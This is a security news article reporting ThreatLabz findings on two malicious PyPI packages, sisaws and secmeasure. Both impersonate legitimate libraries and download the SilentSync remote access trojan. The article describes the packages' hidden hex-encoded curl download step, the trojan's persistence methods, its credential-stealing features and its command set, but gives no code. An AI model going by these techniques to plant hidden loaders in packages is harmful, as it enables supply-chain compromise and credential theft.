Ddos 
Zscaler ThreatLabz has uncovered yet another supply chain attack against the Python Package Index (PyPI). In August 2025, researchers identified two malicious packages—sisaws and secmeasure—that masqueraded as legitimate libraries while delivering a Python-based Remote Access Trojan (RAT) dubbed SilentSync.
ThreatLabz explained, “In July 2025, a malicious Python package named termncolor was identified. Just a few weeks later, on August 4, 2025, ThreatLabz uncovered two more malicious Python packages named sisaws and secmeasure.” Both packages were authored by the same actor and distributed through PyPI.
While sisaws was designed to impersonate Argentina’s official healthcare integration package sisa, the secmeasure package posed as a security utility. Both contained hidden functions that, when invoked, downloaded and executed SilentSync from Pastebin.
According to Zscaler’s analysis, “SilentSync is capable of remote command execution, file exfiltration, and screen capturing. SilentSync also extracts web browser data, including credentials, history, autofill data, and cookies from web browsers like Chrome, Brave, Edge, and Firefox.”
SilentSync establishes persistence across multiple platforms, although the malicious PyPI packages currently only infect Windows systems. ThreatLabz observed that:
- On Windows, SilentSync creates registry entries to auto-run at startup.
- On Linux, it uses crontab @reboot directives.
- On macOS, it leverages LaunchAgents.
The RAT communicates with its command-and-control (C2) server via HTTP, using periodic beaconing and task polling. The researchers noted, “SilentSync communicates with a command-and-control (C2) server using HTTP, with periodic beaconing and task polling.”
Supported commands include:
- cmd: Execute arbitrary shell commands.
- get: Exfiltrate files or entire directories.
- screenshot: Capture desktop screenshots.
- browserdata: Steal sensitive data from web browsers.
Notably, when exfiltrating directories, the RAT compresses them into ZIP archives before uploading.
The sisaws package carefully mimicked Argentina’s healthcare API integrations. ThreatLabz reported, “The sisaws package superficially mimics the behavior of the legitimate modules (puco and renaper)… At a very quick glance, the sisaws package appears to be a legitimate Python library to interface with Argentina’s healthcare services.”
However, its __init__.py file contained a malicious function (gen_token) that issued fake API-like responses when provided with a hardcoded token. This function then decoded a hex string into a curl command to fetch and execute SilentSync.
The secmeasure package pretended to be a simple string-cleaning library, even offering legitimate-looking functions such as strip_whitespace and escape_html. But as ThreatLabz noted, “Similar to sisaws, the secmeasure initialization script contains a malicious function named sanitize_input, that when invoked, will execute the same hex-encoded curl command used by the sisaws package to distribute SilentSync RAT.”
Related Posts:
- A Trojan in Disguise: New Python Package on PyPI Hides a Multi-Stage Malware Operation
- PyPI Swiftly Patches Privilege Escalation Flaw in Organizations Feature
- PyPI Warns of Sophisticated Phishing Campaign Targeting Python Developers
- PyPI Poisoned: 116 Malicious Packages Target Windows and Linux
- Malicious PyPI Package Targets Discord Developers with Token Theft and Backdoor Exploit
Donate